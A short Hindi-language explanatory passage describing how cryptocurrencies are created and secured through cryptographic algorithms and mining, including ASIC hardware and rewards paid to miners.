क्रिप्टोकरेंसी क्रिप्टोग्राफिक एल्गोरिदम के माध्यम से बनाई (और सुरक्षित) की जाती हैं जो एक प्रक्रिया में बनाए और पुष्टि किए जाते हैं जिसे माइनिंग कहा जाता है, जहां कंप्यूटर का एक नेटवर्क या एप्लिकेशन-विशिष्ट एकीकृत सर्किट (ASIC) जैसे विशेष हार्डवेयर लेन-देन को संसाधित और मान्य करते हैं। यह प्रक्रिया नेटवर्क चलाने वाले माइनर्स को क्रिप्टोकरेंसी के साथ प्रोत्साहित करती है।